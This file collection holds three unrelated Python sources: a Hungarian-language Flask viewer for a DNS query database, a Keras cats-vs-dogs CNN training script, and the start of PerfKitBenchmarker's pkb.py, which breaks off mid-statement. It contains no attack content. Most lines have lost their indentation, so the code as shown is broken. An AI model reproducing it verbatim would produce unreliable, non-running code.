@app.template_filter('format_index')
def format_index(index_sql):
split_regex = re.compile(r'\bon\b', re.I)
if not split_regex.search(index_sql):
return index_sql
create, definition = split_regex.split(index_sql)
return '\nON '.join((create.strip(), definition.strip()))
@app.template_filter('value_filter')
def value_filter(value, max_length=50, field=None):
if field is not None:
if field == "timestamp":
localts = value - offset*60
localtime = datetime.datetime.fromtimestamp(localts)
return localtime
if isinstance(value, numeric):
return value
if isinstance(value, binary_types):
if not isinstance(value, (bytes, bytearray)):
value = bytes(value) # Handle `buffer` type.
value = value.decode('utf-8', decode_handler)
if isinstance(value, unicode_type):
value = escape(value)
if len(value) > max_length:
return ('<span class="truncated">%s</span> '
'<span class="full" style="display:none;">%s</span>'
'<a class="toggle-value" href="#">...</a>') % (
value[:max_length],
value)
return value
@app.template_filter('column_filter_display')
def column_filter_display(column):
nameDict = {"id":"ID", "timestamp":"Időbélyeg", "domain":"Domain", "client":"Kliens", "realIP":"Feloldott IP"}
return nameDict[column]
@app.template_filter('column_filter')
def column_filter(columns):
newColumns = [column for column in columns if column in ["id", "domain", "timestamp", "client", "realIP"]]
return newColumns
column_re = re.compile(r'(.+?)\((.+)\)', re.S)
column_split_re = re.compile(r'(?:[^,(]|\([^)]*\))+')
def _format_create_table(sql):
create_table, column_list = column_re.search(sql).groups()
columns = [' %s' % column.strip()
for column in column_split_re.findall(column_list)
if column.strip()]
return '%s (\n%s\n)' % (
create_table,
',\n'.join(columns))
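# Example: _format_create_table('CREATE TABLE queries (id INTEGER, domain TEXT)')
# reflows the statement so each column definition sits on its own line between
# 'CREATE TABLE queries (' and the closing parenthesis.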
@app.template_filter()
def format_create_table(sql):
try:
return _format_create_table(sql)
except:
return sql
@app.template_filter('highlight')
def highlight_filter(data):
return Markup(syntax_highlight(data))
def get_query_images():
accum = []
image_dir = os.path.join(app.static_folder, 'img')
if not os.path.exists(image_dir):
return accum
for filename in sorted(os.listdir(image_dir)):
basename = os.path.splitext(os.path.basename(filename))[0]
parts = basename.split('-')
accum.append((parts, 'img/' + filename))
return accum
#
# Flask application helpers.
#
@app.context_processor
def _general():
return {
'dataset': dataset,
'login_required': True,
}
@app.context_processor
def _now():
return {'now': datetime.datetime.now()}
@app.before_request
def _connect_db():
dataset.connect()
@app.teardown_request
def _close_db(exc):
if not dataset._database.is_closed():
dataset.close()
if not live_dataset._database.is_closed():
live_dataset.close()
class PrefixMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = '/%s' % prefix.strip('/')
self.prefix_len = len(self.prefix)
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith(self.prefix):
environ['PATH_INFO'] = environ['PATH_INFO'][self.prefix_len:]
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
else:
start_response('404 NOT FOUND', [('Content-Type', 'text/plain')])
return ['URL does not match application prefix.'.encode()]
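# Example (hypothetical prefix): mount the app under /adatgyujtes/ by wrapping
# the WSGI callable:
#
#     app.wsgi_app = PrefixMiddleware(app.wsgi_app, prefix='adatgyujtes')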
#
# Script options.
#
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-p',
'--port',
default=80,
help='Port for web interface, default=80',
type='int')
parser.add_option(
'-H',
'--host',
default='0.0.0.0',
help='Host for web interface, default=0.0.0.0')
parser.add_option(
'-d',
'--debug',
action='store_true',
help='Run server in debug mode')
return parser
def die(msg, exit_code=1):
sys.stderr.write('%s\n' % msg)
sys.stderr.flush()
sys.exit(exit_code)
def open_browser_tab(host, port):
url = 'http://%s:%s/' % (host, port)
def _open_tab(url):
time.sleep(1.5)
webbrowser.open_new_tab(url)
thread = threading.Thread(target=_open_tab, args=(url,))
thread.daemon = True
thread.start()
@app.before_request
def check_password():
session.permanent = True
app.permanent_session_lifetime = datetime.timedelta(minutes=5)
if not session.get('authorized') and request.path != '/login/' and \
not request.path.startswith(('/static/', '/favicon')):
flash('Az adatbázis csak bejelentkezés után tekinthető meg.', 'danger')
session['next_url'] = request.base_url
return redirect(url_for('login'))
else:
if CONFIG.completed and not '/thanks/' in request.path:
return redirect(url_for('thanks'))
def initialize_app():
global dataset
global live_dataset
global migrator
print("OK2")
try:
print("PRIVADOME DB_PATH - : ", CONFIG.database_path)
print("Copydb: ", CONFIG.copied_database_path)
shutil.copy(CONFIG.database_path, CONFIG.copied_database_path)
dataset = SqliteDataSet('sqlite:///{path}'.format(path=CONFIG.copied_database_path), bare_fields=True)
live_dataset = SqliteDataSet('sqlite:///{path}'.format(path=CONFIG.database_path), bare_fields=True)
except Exception as e:
print("Hiba történt a fájl megnyitása közben. Ellenőrizze, hogy a privadome core alkalmazás feltelepült és működik az adatmentés.")
print(e)
raise
#migrator = dataset._migrator
dataset.close()
live_dataset.close()
def main():
global CONFIG
# This function exists to act as a console script entry-point.
parser = get_option_parser()
options, args = parser.parse_args()
if not os.path.exists('config.ini'):
config.init_device(options.debug)
if options.debug:
try:
CONFIG = config.Config(config.ConfigTypes.TEST)
except KeyError:
config.init_device(options.debug)
CONFIG = config.Config(config.ConfigTypes.TEST)
else:
try:
CONFIG = config.Config(config.ConfigTypes.DEFAULT)
except KeyError:
config.init_device(options.debug)
CONFIG = config.Config(config.ConfigTypes.DEFAULT)
initialize_app()
app.run(host=options.host, port=options.port, debug=options.debug)
if __name__ == '__main__':
main()
|
Deep_Learning_CatxDog.py
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: demetrios
"""
#%% [1] Required imports
import numpy as np
import pandas as pd
import pickle
from os import listdir
from os.path import join, basename
from PIL import Image
#%% [2] Network configuration
IMG_HEIGHT = 50
IMG_WIDTH = 50
NUM_CHANNELS = 3
from threading import current_thread, Thread, Lock
from multiprocessing import Queue
# Any results you write to the current directory are saved as output.
#%% [3] Initializing the network settings
batch_size = 500
num_train_images = 25000
num_test_images = 12500
num_train_threads = int(num_train_images/batch_size) # 50
num_test_threads = int(num_test_images/batch_size) # 25
lock = Lock()
#%% [4] Using a queue to collect the data
def initialize_queue():
queue = Queue()
return queue
#%% [5] Setting up the train and test datasets
train_dir_path = 'dogs-vs-cats/train/'
test_dir_path = 'dogs-vs-cats/test1/'
train_imgs = [join(train_dir_path,f) for f in listdir(train_dir_path)]
test_imgs = [join(test_dir_path,f) for f in listdir(test_dir_path)]
print(len(train_imgs))
print(len(test_imgs))
#%% [6] Parsing image filenames to derive the labels
def get_img_label(fpath):
category = fpath.split(".")[-3]
if category == "dog":
return [1,0]
elif category == "cat":
return [0,1]
#%%
def get_img_array_labels(fpaths, queue):
img_array = None
labels = []
for f in fpaths:
arr = Image.open(f)
arr = arr.resize((IMG_HEIGHT,IMG_WIDTH), Image.ANTIALIAS)
arr = np.reshape(arr, (-1, IMG_HEIGHT, IMG_WIDTH, NUM_CHANNELS))
if img_array is None:
img_array = arr
else:
img_array = np.vstack((img_array, arr))
labels.append(get_img_label(basename(f)))
labels = np.array(labels)
queue.put((img_array, labels))
#%%
def get_img_array(fpaths, queue):
img_array = None
for f in fpaths:
arr = Image.open(f)
arr = arr.resize((IMG_HEIGHT,IMG_WIDTH), Image.ANTIALIAS)
arr = np.reshape(arr, (-1, IMG_HEIGHT, IMG_WIDTH, NUM_CHANNELS))
if img_array is None:
img_array = arr
else:
img_array = np.vstack((img_array, arr))
queue.put(img_array)
#%%
def dump_array(fname,arr):
with open(fname,'wb') as f:
pickle.dump(arr,f)
#%%
def load_pickled_array(fname):
    with open(fname, 'rb') as f:
        return pickle.load(f)
#%%
# using threading combine training array and labels for training data
def get_training_data():
threads_list = list()
train_x = None
train_y = []
queue = initialize_queue()
# iterate over num of threads to create
for thread_index in range(num_train_threads):
start_index = thread_index * batch_size
end_index = (thread_index + 1) * batch_size
file_batch = train_imgs[start_index:end_index]
        thread = Thread(target=get_img_array_labels, args=(file_batch, queue))
thread.start()
print("Thread: {}, start index: {}, end index: {}".format(thread.name, start_index, end_index))
threads_list.append(thread)
# join threads
for t in threads_list:
t.join()
while not queue.empty():
arr, labels = queue.get()
train_y.extend(labels)
if train_x is None:
train_x = arr
else:
train_x = np.vstack((train_x, arr))
return train_x, train_y
#%%
# using multithreading combine testing array for testing data
def get_testing_data():
threads_list = list()
test_x = None
queue = initialize_queue()
# iterate over num of threads to create
for thread_index in range(num_test_threads):
start_index = thread_index * batch_size
end_index = (thread_index + 1) * batch_size
        file_batch = test_imgs[start_index:end_index]
        thread = Thread(target=get_img_array, args=(file_batch, queue))
thread.start()
print("Thread: {}, start index: {}, end index: {}".format(thread.name, start_index, end_index))
threads_list.append(thread)
# join threads
for t in threads_list:
t.join()
print("Thread: {} joined", t.name)
while not queue.empty():
arr= queue.get()
if test_x is None:
test_x = arr
else:
test_x = np.vstack((test_x, arr))
return test_x
#%%
train_x, train_y = get_training_data()
#%%
print(train_x.shape)
print(len(train_y))
#%%
test_x = get_testing_data()
print(test_x.shape)
#%%
dump_array('train_arr.pickle',train_x)
dump_array('train_labels.pickle',train_y)
#%%
# dump testing data
dump_array('test_arr.pickle',test_x)
#%%
print("train_x shape",train_x.shape)
print("test_x shape", test_x.shape)
# convert train_y to a numpy array
train_y = np.array(train_y)
print("train_y.shape", train_y.shape)
#%%
# scale pixel values into the [0, 1] range
train_x = train_x/255
test_x = test_x/255
#%%
# import required packages
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten, BatchNormalization
from keras.layers import Conv2D, MaxPooling2D
from keras.utils import np_utils, to_categorical
from sklearn.model_selection import train_test_split
#%%
# CNN model
model = Sequential()
# -----------------------------------------------------------------------------------
# conv 1
model.add(Conv2D(16, (3,3), input_shape=(50,50,3))) # 48,48,16
model.add(BatchNormalization(axis=3))
model.add(Activation('relu'))
#model.add(Dropout(0.5))
# max pool 1
model.add(MaxPooling2D(pool_size=(2,2),strides=2)) # 24,24,16
# -----------------------------------------------------------------------------------
# conv 2
model.add(Conv2D(16, (3,3))) # 22,22,16
model.add(BatchNormalization(axis=3))
model.add(Activation('relu'))
#model.add(Dropout(0.5))
# max pool 2
model.add(MaxPooling2D(pool_size=(2,2),strides=2)) # 11,11,16
# -----------------------------------------------------------------------------------
# conv 3
model.add(Conv2D(32, (3,3))) # 9,9,32
model.add(BatchNormalization(axis=3))
model.add(Activation('relu'))
#model.add(Dropout(0.7))
# max pool 3
model.add(MaxPooling2D(pool_size=(2,2),strides=2)) # 4,4,32
# -----------------------------------------------------------------------------------
# conv 4
model.add(Conv2D(32, (3,3))) # 2,2,32
model.add(BatchNormalization(axis=3))
model.add(Activation('relu'))
#model.add(Dropout(0.7))
# max pool 4
model.add(MaxPooling2D(pool_size=(2,2),strides=2)) # 1,1,32
# flatten
model.add(Flatten())
# fc layer 1
model.add(Dense(512, activation='relu'))
#model.add(Dropout(0.7))
#model.add(Dense(256, activation='relu'))
#model.add(Dropout(0.5))
# fc layer 2
model.add(Dense(2, activation='softmax'))
#%%
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
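#%%
# The original script calls model.predict without ever fitting the model.
# A minimal training step is sketched below; the epochs, batch size, and
# validation split are assumed values, not taken from the original script.
X_tr, X_val, y_tr, y_val = train_test_split(train_x, train_y, test_size=0.1)
model.fit(X_tr, y_tr, validation_data=(X_val, y_val), epochs=10, batch_size=32)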
#%%
predictions = model.predict(test_x, batch_size=32, verbose=1)
#%%
model.summary()
#%%
import matplotlib.pyplot as plt
# %matplotlib inline
fig=plt.figure()
for index in range(12):
    # dog: [1,0]
    # cat: [0,1]
y = fig.add_subplot(3,4,index+1)
#model_out = model.predict([data])[0]
img = test_x[index]
model_out = predictions[index]
if np.argmax(model_out) == 0: str_label='Dog'
else: str_label='Cat'
y.imshow(img)
plt.title(str_label)
y.axes.get_xaxis().set_visible(False)
y.axes.get_yaxis().set_visible(False)
plt.show()
#%%
with open('submission.csv','w') as f:
f.write('id,label\n')
for index in range(len(test_imgs)):
        img_id = basename(test_imgs[index]).split(".")[0]
        prob = predictions[index, 0]
#print("index: {}, img_id: {}, prob:{}".format(index,img_id, prob))
f.write("{},{}\n".format(img_id, prob))
|
pkb.py
|
# Copyright 2019 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs all benchmarks in PerfKitBenchmarker.
All benchmarks in PerfKitBenchmarker export the following interface:
GetConfig: this returns the name of the benchmark, the number of machines
required to run one instance of the benchmark, a detailed description
of the benchmark, and if the benchmark requires a scratch disk.
Prepare: this function takes a list of VMs as an input parameter. The benchmark
will then get all binaries required to run the benchmark and, if
required, create data files.
Run: this function takes a list of VMs as an input parameter. The benchmark will
then run the benchmark upon the machines specified. The function will
     return a dictionary containing the results of the benchmark.
Cleanup: this function takes a list of VMs as an input parameter. The benchmark
will then return the machine to the state it was at before Prepare
was called.
PerfKitBenchmarker has the following run stages: provision, prepare,
run, cleanup, teardown, and all.
provision: Read command-line flags, decide what benchmarks to run, and
create the necessary resources for each benchmark, including
networks, VMs, disks, and keys, and generate a run_uri, which can
be used to resume execution at later stages.
prepare: Execute the Prepare function of each benchmark to install
necessary software, upload datafiles, etc.
run: Execute the Run function of each benchmark and collect the
generated samples. The publisher may publish these samples
according to PKB's settings. The Run stage can be called multiple
times with the run_uri generated by the provision stage.
cleanup: Execute the Cleanup function of each benchmark to uninstall
software and delete data files.
teardown: Delete VMs, key files, networks, and disks created in the
'provision' stage.
all: PerfKitBenchmarker will run all of the above stages (provision,
prepare, run, cleanup, teardown). Any resources generated in the
provision stage will be automatically deleted in the teardown
stage, even if there is an error in an earlier stage. When PKB is
running in this mode, the run cannot be repeated or resumed using
the run_uri.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import getpass
import itertools
import json
import logging
import multiprocessing
from os.path import isfile
import random
import re
import sys
import threading
import time
from typing import List, Optional
import uuid
from absl import flags
from perfkitbenchmarker import archive
from perfkitbenchmarker import background_tasks
from perfkitbenchmarker import benchmark_lookup
from perfkitbenchmarker import benchmark_sets
from perfkitbenchmarker import benchmark_spec
from perfkitbenchmarker import benchmark_status
from perfkitbenchmarker import configs
from perfkitbenchmarker import context
from perfkitbenchmarker import disk
from perfkitbenchmarker import errors
from perfkitbenchmarker import events
from perfkitbenchmarker import flag_util
from perfkitbenchmarker import linux_benchmarks
from perfkitbenchmarker import log_util
from perfkitbenchmarker import os_types
from perfkitbenchmarker import package_lookup
from perfkitbenchmarker import requirements
from perfkitbenchmarker import sample
from perfkitbenchmarker import spark_service
from perfkitbenchmarker import stages
from perfkitbenchmarker import static_virtual_machine
from perfkitbenchmarker import timing_util
from perfkitbenchmarker import traces
from perfkitbenchmarker import version
from perfkitbenchmarker import vm_util
from perfkitbenchmarker import windows_benchmarks
from perfkitbenchmarker.configs import benchmark_config_spec
from perfkitbenchmarker.linux_benchmarks import cluster_boot_benchmark
from perfkitbenchmarker.publisher import SampleCollector
import six
from six.moves import zip
LOG_FILE_NAME = 'pkb.log'
COMPLETION_STATUS_FILE_NAME = 'completion_statuses.json'
REQUIRED_INFO = ['scratch_disk', 'num_machines']
REQUIRED_EXECUTABLES = frozenset(['ssh', 'ssh-keygen', 'scp', 'openssl'])
MAX_RUN_URI_LENGTH = 12
FLAGS = flags.FLAGS
# Define patterns for help text processing.
BASE_RELATIVE = '../' # Relative path from markdown output to PKB home for link writing.
MODULE_REGEX = r'^\s+?(.*?):.*' # Pattern that matches module names.
FLAGS_REGEX = r'(^\s\s--.*?(?=^\s\s--|\Z))+?' # Pattern that matches each flag.
FLAGNAME_REGEX = r'^\s+?(--.*?)(:.*\Z)' # Pattern that matches flag name in each flag.
DOCSTRING_REGEX = r'"""(.*?|$)"""' # Pattern that matches triple quoted comments.
flags.DEFINE_list('ssh_options', [], 'Additional options to pass to ssh.')
flags.DEFINE_boolean('use_ipv6', False, 'Whether to use ipv6 for ssh/scp.')
flags.DEFINE_list('benchmarks', [benchmark_sets.STANDARD_SET],
'Benchmarks and/or benchmark sets that should be run. The '
'default is the standard set. For more information about '
'benchmarks and benchmark sets, see the README and '
'benchmark_sets.py.')
flags.DEFINE_boolean('multi_os_benchmark', False, 'Whether this benchmark '
                     'will involve multiple OS types.')
flags.DEFINE_string('archive_bucket', None,
'Archive results to the given S3/GCS bucket.')
flags.DEFINE_string('project', None, 'GCP project ID under which '
'to create the virtual machines')
flags.DEFINE_multi_string(
'zone', [],
'Similar to the --zones flag, but allows the flag to be specified '
'multiple times on the commandline. For example, --zone=a --zone=b is '
'equivalent to --zones=a,b. Furthermore, any values specified by --zone '
    'will be appended to those specified by --zones.')
flags.DEFINE_list(
'zones', [],
'A list of zones within which to run PerfKitBenchmarker. '
'This is specific to the cloud provider you are running on. '
    'If multiple zones are given, PerfKitBenchmarker will create 1 VM in '
    'each zone, until enough VMs are created as specified in each '
'benchmark. The order in which this flag is applied to VMs is '
'undefined.')
flags.DEFINE_list(
'extra_zones', [],
'Zones that will be appended to the "zones" list. This is functionally '
'the same, but allows flag matrices to have two zone axes.')
# TODO(user): note that this is currently very GCE specific. Need to create a
# module which can translate from some generic types to provider specific
# nomenclature.
flags.DEFINE_string('machine_type', None, 'Machine '
'types that will be created for benchmarks that don\'t '
'require a particular type.')
flags.DEFINE_integer('num_vms', 1, 'For benchmarks which can make use of a '
'variable number of machines, the number of VMs to use.')
flags.DEFINE_string('image', None, 'Default image that will be '
'linked to the VM')
flags.DEFINE_string('run_uri', None, 'Name of the Run. If provided, this '
'should be alphanumeric and less than or equal to %d '
'characters in length.' % MAX_RUN_URI_LENGTH)
flags.DEFINE_boolean('use_pkb_logging', True, 'Whether to use PKB-specific '
'logging handlers. Disabling this will use the standard '
'ABSL logging directly.')
flags.DEFINE_boolean('log_dmesg', False, 'Whether to log dmesg from '
'each VM to the PKB log file before the VM is deleted.')
flags.DEFINE_boolean('always_teardown_on_exception', False, 'Whether to tear '
                     'down VMs when there is an exception during the PKB run. If '
'enabled, VMs will be torn down even if FLAGS.run_stage '
'does not specify teardown.')
def GetCurrentUser():
"""Get the current user name.
On some systems the current user information may be unavailable. In these
cases we just need a string to tag the created resources with. It should
not be a fatal error.
Returns:
User name OR default string if user name not available.
"""
try:
return getpass.getuser()
except KeyError:
return 'user_unknown'
flags.DEFINE_string(
'owner', GetCurrentUser(), 'Owner name. '
'Used to tag created resources and performance records.')
flags.DEFINE_enum(
'log_level', log_util.INFO,
list(log_util.LOG_LEVELS.keys()),
'The log level to run at.')
flags.DEFINE_enum(
'file_log_level', log_util.DEBUG, list(log_util.LOG_LEVELS.keys()),
'Anything logged at this level or higher will be written to the log file.')
flags.DEFINE_integer('duration_in_seconds', None,
'duration of benchmarks. '
'(only valid for mesh_benchmark)')
flags.DEFINE_string('static_vm_file', None,
'The file path for the Static Machine file. See '
'static_virtual_machine.py for a description of this file.')
flags.DEFINE_boolean('version', False, 'Display the version and exit.',
allow_override_cpp=True)
flags.DEFINE_boolean('time_commands', False, 'Times each command issued.')
flags.DEFINE_enum(
'scratch_disk_type', None,
[disk.STANDARD, disk.REMOTE_SSD, disk.PIOPS, disk.LOCAL],
    'Type for all scratch disks. The default is standard.')
flags.DEFINE_string(
'data_disk_type', None,
'Type for all data disks. If a provider keeps the operating system and '
    'user data on separate disks, this only affects the user data disk(s). '
    'If the provider has OS and user data on the same disk, this flag '
    'affects that disk.')
flags.DEFINE_integer('scratch_disk_size', None, 'Size, in GB, for all scratch '
                     'disks.')
flags.DEFINE_integer('data_disk_size', None, 'Size, in GB, for all data disks.')
flags.DEFINE_integer('scratch_disk_iops', None,
'IOPS for Provisioned IOPS (SSD) volumes in AWS.')
flags.DEFINE_integer('num_striped_disks', None,
'The number of data disks to stripe together to form one '
'"logical" data disk. This defaults to 1 '
'(except with local disks), which means no striping. '
'When using local disks, they default to striping '
'all disks together. The striped disks will appear as '
'one disk (data_disk_0) in the metadata.',
lower_bound=1)
flags.DEFINE_bool('install_packages', None,
'Override for determining whether packages should be '
'installed. If this is false, no packages will be installed '
'on any VMs. This option should probably only ever be used '
'if you have already created an image with all relevant '
'packages installed.')
flags.DEFINE_bool(
'stop_after_benchmark_failure', False,
'Determines response when running multiple benchmarks serially and a '
'benchmark run fails. When True, no further benchmarks are scheduled, and '
'execution ends. When False, benchmarks continue to be scheduled. Does not '
'apply to keyboard interrupts, which will always prevent further '
'benchmarks from being scheduled.')
flags.DEFINE_boolean(
'ignore_package_requirements', False,
'Disables Python package requirement runtime checks.')
flags.DEFINE_enum('spark_service_type', None,
[spark_service.PKB_MANAGED, spark_service.PROVIDER_MANAGED],
'Type of spark service to use')
flags.DEFINE_boolean(
'publish_after_run', False,
'If true, PKB will publish all samples available immediately after running '
'each benchmark. This may be useful in scenarios where the PKB run time '
'for all benchmarks is much greater than a single benchmark.')
flags.DEFINE_integer(
'publish_period', None,
'The period in seconds to publish samples from repeated run stages. '
'This will only publish samples if publish_after_run is True.')
flags.DEFINE_integer(
'run_stage_time', 0,
'PKB will run/re-run the run stage of each benchmark until it has spent '
'at least this many seconds. It defaults to 0, so benchmarks will only '
'be run once unless some other value is specified. This flag and '
'run_stage_iterations are mutually exclusive.')
flags.DEFINE_integer(
'run_stage_iterations', 1,
'PKB will run/re-run the run stage of each benchmark this many times. '
'It defaults to 1, so benchmarks will only be run once unless some other '
'value is specified. This flag and run_stage_time are mutually exclusive.')
flags.DEFINE_integer(
'run_stage_retries', 0,
'The number of allowable consecutive failures during the run stage. After '
'this number of failures any exceptions will cause benchmark termination. '
'If run_stage_time is exceeded, the run stage will not be retried even if '
'the number of failures is less than the value of this flag.')
flags.DEFINE_boolean(
'boot_samples', False,
'Whether to publish boot time samples for all tests.')
flags.DEFINE_integer(
'run_processes', None,
'The number of parallel processes to use to run benchmarks.',
lower_bound=1)
flags.DEFINE_float(
'run_processes_delay', None,
'The delay in seconds between parallel processes\' invocation. '
'Increasing this value may reduce provider throttling issues.',
lower_bound=0)
flags.DEFINE_string(
'completion_status_file', None,
'If specified, this file will contain the completion status of each '
'benchmark that ran (SUCCEEDED, FAILED, or SKIPPED). The file has one json '
'object per line, each with the following format:\n'
'{ "name": <benchmark name>, "flags": <flags dictionary>, '
'"status": <completion status> }')
flags.DEFINE_string(
'helpmatch', '',
'Shows only flags defined in a module whose name matches the given regex.',
allow_override_cpp=True)
flags.DEFINE_string(
'helpmatchmd', '',
'helpmatch query with markdown friendly output. '
'Shows only flags defined in a module whose name matches the given regex.',
allow_override_cpp=True)
flags.DEFINE_boolean(
'create_failed_run_samples', False,
'If true, PKB will create a sample specifying that a run stage failed. '
'This sample will include metadata specifying the run stage that '
'failed, the exception that occurred, as well as all the flags that '
'were provided to PKB on the command line.')
flags.DEFINE_boolean(
'create_started_run_sample', False,
'Whether PKB will create a sample at the start of the provision phase of '
'the benchmark run.')
flags.DEFINE_integer(
'failed_run_samples_error_length', 10240,
'If create_failed_run_samples is true, PKB will truncate any error '
'messages at failed_run_samples_error_length.')
flags.DEFINE_boolean(
'dry_run', False,
'If true, PKB will print the flags configurations to be run and exit. '
'The configurations are generated from the command line flags, the '
'flag_matrix, and flag_zip.')
flags.DEFINE_string(
'skip_pending_runs_file', None,
'If file exists, any pending runs will be not be executed.')
flags.DEFINE_boolean(
'use_vpn', False,
'Creates VPN tunnels between vm_groups')
flags.DEFINE_integer(
'after_prepare_sleep_time', 0,
'The time in seconds to sleep after the prepare phase. This can be useful '
'for letting burst tokens accumulate.')
flags.DEFINE_integer(
'after_run_sleep_time', 0,
'The time in seconds to sleep after the run phase. This can be useful '
    'for letting the VM sit idle after the benchmarking phase is complete.')
flags.DEFINE_bool(
'before_run_pause', False,
'If true, wait for command line input before executing the run phase. '
'This is useful for debugging benchmarks during development.')
flags.DEFINE_bool(
'before_cleanup_pause', False,
'If true, wait for command line input before executing the cleanup phase. '
'This is useful for debugging benchmarks during development.')
flags.DEFINE_integer(
'timeout_minutes', 240,
'An upper bound on the time in minutes that the benchmark is expected to '
'run. This time is annotated or tagged on the resources of cloud '
'providers.')
flags.DEFINE_integer(
'persistent_timeout_minutes', 240,
'An upper bound on the time in minutes that resources left behind by the '
'benchmark. Some benchmarks purposefully create resources for other '
'benchmarks to use. Persistent timeout specifies how long these shared '
'resources should live.')
flags.DEFINE_bool('disable_interrupt_moderation', False,
'Turn off the interrupt moderation networking feature')
flags.DEFINE_bool('disable_rss', False,
'Whether or not to disable the Receive Side Scaling feature.')
flags.DEFINE_boolean('record_lscpu', True,
'Whether to record the lscpu output in a sample')
flags.DEFINE_boolean('record_proccpu', True,
'Whether to record the /proc/cpuinfo output in a sample')
flags.DEFINE_boolean('record_cpu_vuln', True,
'Whether to record the CPU vulnerabilities on linux VMs')
# Support for using a proxy in the cloud environment.
flags.DEFINE_string('http_proxy', '',
'Specify a proxy for HTTP in the form '
'[user:passwd@]proxy.server:port.')
flags.DEFINE_string('https_proxy', '',
'Specify a proxy for HTTPS in the form '
'[user:passwd@]proxy.server:port.')
flags.DEFINE_string('ftp_proxy', '',
'Specify a proxy for FTP in the form '
'[user:passwd@]proxy.server:port.')
flags.DEFINE_bool('randomize_run_order', False,
'When running with more than one benchmarks, '
'randomize order of the benchmarks.')
_TEARDOWN_EVENT = multiprocessing.Event()
events.initialization_complete.connect(traces.RegisterAll)
def _InjectBenchmarkInfoIntoDocumentation():
"""Appends each benchmark's information to the main module's docstring."""
  # TODO: Verify if there is another way of appending an additional help
  # message.
# Inject more help documentation
# The following appends descriptions of the benchmarks and descriptions of
# the benchmark sets to the help text.
benchmark_sets_list = [
'%s: %s' %
(set_name, benchmark_sets.BENCHMARK_SETS[set_name]['message'])
for set_name in benchmark_sets.BENCHMARK_SETS]
sys.modules['__main__'].__doc__ = (
'PerfKitBenchmarker version: {version}\n\n{doc}\n'
'Benchmarks (default requirements):\n'
'\t{benchmark_doc}').format(
version=version.VERSION,
doc=__doc__,
benchmark_doc=_GenerateBenchmarkDocumentation())
sys.modules['__main__'].__doc__ += ('\n\nBenchmark Sets:\n\t%s'
% '\n\t'.join(benchmark_sets_list))
def _ParseFlags(argv=sys.argv):
"""Parses the command-line flags."""
try:
argv = FLAGS(argv)
except flags.Error as e:
logging.error(e)
logging.info('For usage instructions, use --helpmatch={module_name}')
logging.info('For example, ./pkb.py --helpmatch=benchmarks.fio')
sys.exit(1)
def _PrintHelp(matches=None):
"""Prints help for flags defined in matching modules.
Args:
    matches: regex string or None. Filters help to only those whose name
        matches the regex. If None then all flags are printed.
"""
if not matches:
print(FLAGS)
else:
flags_by_module = FLAGS.flags_by_module_dict()
modules = sorted(flags_by_module)
regex = re.compile(matches)
for module_name in modules:
if regex.search(module_name):
print(FLAGS.module_help(module_name))
def _PrintHelpMD(matches=None):
"""Prints markdown formatted help for flags defined in matching modules.
Works just like --helpmatch.
Args:
    matches: regex string or None. Filters help to only those whose name
      matches the regex. If None then all flags are printed.
  Eg:
    * all flags: `./pkb.py --helpmatchmd .*` > testsuite_docs/all.md
    * linux benchmarks: `./pkb.py --helpmatchmd linux_benchmarks.*` >
      testsuite_docs/linux_benchmarks.md
    * specific modules: `./pkb.py --helpmatchmd iperf` > testsuite_docs/iperf.md
    * windows packages: `./pkb.py --helpmatchmd windows_packages.*` >
      testsuite_docs/windows_packages.md
    * GCP provider: `./pkb.py --helpmatchmd providers.gcp.*` >
      testsuite_docs/providers_gcp.md
"""
flags_by_module = FLAGS.flags_by_module_dict()
modules = sorted(flags_by_module)
regex = re.compile(matches)
for module_name in modules:
if regex.search(module_name):
# Compile regex patterns.
module_regex = re.compile(MODULE_REGEX)
flags_regex = re.compile(FLAGS_REGEX, re.MULTILINE | re.DOTALL)
flagname_regex = re.compile(FLAGNAME_REGEX, re.MULTILINE | re.DOTALL)
docstring_regex = re.compile(DOCSTRING_REGEX, re.MULTILINE | re.DOTALL)
# Retrieve the helpmatch text to format.
helptext_raw = FLAGS.module_help(module_name)
# Converts module name to github linkable string.
# eg: perfkitbenchmarker.linux_benchmarks.iperf_vpn_benchmark ->
# perfkitbenchmarker/linux_benchmarks/iperf_vpn_benchmark.py
module = re.search(
module_regex,
helptext_raw,
).group(1)
module_link = module.replace('.', '/') + '.py'
# Put flag name in a markdown code block for visibility.
flags = re.findall(flags_regex, helptext_raw)
flags[:] = [flagname_regex.sub(r'`\1`\2', flag) for flag in flags]
      # Get the docstring for the module without importing everything into our
      # namespace. There is probably a better way to do this.
docstring = 'No description available'
      # Only pull docstrings from inside pkb source files.
if isfile(module_link):
with open(module_link, 'r') as f:
source = f.read()
# Get the triple quoted matches.
docstring_match = re.search(docstring_regex, source)
# Some modules don't have docstrings.
# eg perfkitbenchmarker/providers/alicloud/flags.py
if docstring_match is not None:
docstring = docstring_match.group(1)
# Format output and print here.
if isfile(module_link): # Only print links for modules we can find.
        print('### [' + module + '](' + BASE_RELATIVE + module_link + ')\n')
else:
print('### ' + module + '\n')
print('#### Description:\n\n' + docstring + '\n\n#### Flags:\n')
print('\n'.join(flags) + '\n')
def CheckVersionFlag():
"""If the --version flag was specified, prints the version and exits."""
if FLAGS.version:
print(version.VERSION)
sys.exit(0)
def _InitializeRunUri():
"""Determines the PKB run URI and sets FLAGS.run_uri."""
if FLAGS.run_uri is None:
if stages.PROVISION in FLAGS.run_stage:
FLAGS.run_uri = str(uuid.uuid4())[-8:]
else:
# Attempt to get the last modified run directory.
run_uri = vm_util.GetLastRunUri()
if run_uri:
FLAGS.run_uri = run_uri
logging.warning(
